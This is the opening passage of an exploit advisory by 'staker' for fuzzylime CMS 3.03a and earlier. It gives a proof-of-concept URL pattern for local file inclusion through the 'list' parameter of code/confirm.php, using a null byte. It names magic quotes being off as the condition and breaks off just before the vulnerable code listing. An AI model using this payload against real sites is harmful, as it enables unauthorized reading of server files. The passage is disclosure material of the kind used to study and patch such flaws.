+------------------------------------------------------------------------+ | fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc | +-----------+------------------------------------------------------------+ | by staker | +-----------+---------------------+ | mail: staker[at]hotmail[dot]it | | url: http://cms.fuzzylime.co.uk | +---------------------------------+ [1][LFI] http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte } Vulnerable code: confirm.php (local file inclusion mq=off) ----------------------------------------------------------------- 1.